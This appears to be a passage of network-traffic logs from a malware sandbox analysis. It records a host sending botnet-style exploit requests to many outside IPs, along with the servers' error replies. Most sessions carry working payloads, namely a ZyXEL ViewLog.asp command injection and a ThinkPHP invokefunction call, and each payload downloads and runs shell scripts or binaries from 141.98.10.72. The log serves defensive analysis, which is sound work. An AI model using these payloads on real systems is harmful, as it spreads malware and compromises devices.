                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        497192.168.2.143594294.123.94.1548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.160036087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        498192.168.2.144533295.210.128.2580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.189474106 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        499192.168.2.143372295.179.131.11980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.189553022 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:02.388336897 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        500192.168.2.143337095.100.66.18180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.194680929 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:02.398921013 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 36 34 32 26 23 34 36 3b 33 33 65 36 35 37 65 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;977a7b5c&#46;1707899642&#46;33e657eb</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        501192.168.2.144008895.143.185.12080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.202344894 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:02.414134026 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 69 74 2e 6d 35 31 2e 73 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at it.m51.su Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        502192.168.2.143732695.163.240.11180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.234389067 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:02.477557898 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.22.1
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        503192.168.2.144652631.20.210.1428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.298386097 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:02.512020111 CET626INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Wed, 14 Feb 2024 08:34:01 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        504192.168.2.146050285.26.216.1778080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.359257936 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:02.660326004 CET711INHTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 150
                                                        Connection: keep-alive
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        Content-Security-Policy: default-src * data: blob: ws: wss: gap://ready file://*; style-src * 'unsafe-inline'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * ws: wss:;
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        505192.168.2.144642894.121.188.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.398310900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        506192.168.2.143720062.29.70.718080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.400155067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        507192.168.2.145678895.86.71.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.406737089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        508192.168.2.143556031.173.67.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.428291082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        509192.168.2.1450088112.160.181.5980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.665713072 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:02.943022013 CET35INHTTP/1.0 301 Redirect
                                                        Feb 14, 2024 09:34:02.943038940 CET377INData Raw: 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 37 3a 33 34 3a 30 32 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74
                                                        Data Ascii: Date: Wed Feb 14 17:34:02 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to a new <a href="http://


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        510192.168.2.1445272112.76.195.19880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.684531927 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:02.984755993 CET288INHTTP/1.1 200 OK
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Server: Apache/2.4.20 (Unix) PHP/7.0.2
                                                        X-Powered-By: PHP/7.0.2
                                                        Content-Length: 39
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 0a 66 69 6e 64 20 70 61 74 68 20 65 72 72 6f 72 20 5b 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 5d
                                                        Data Ascii: find path error [/index.php?s=/index/]


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        511192.168.2.1456646112.81.87.21280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.717005968 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:03.048773050 CET956INHTTP/1.1 400 Bad Request
                                                        Server: Tengine
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 809
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 6d 65 72 67 65 34 2e 6c 32 63 6e 33 30 32 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 32 2f 31 34 20 31 36 3a 33 34 3a 30 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body bgcolor="white"><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'</td></tr><tr><td>Server:</td><td>merge4.l2cn3022</td></tr><tr><td>Date:</td><td>2024/02/14 16:34:02</td></tr></table><hr/>Powered by Tengine</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        512192.168.2.1443388112.29.212.1980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.740736008 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:03.096128941 CET477INHTTP/1.1 400 Bad Request
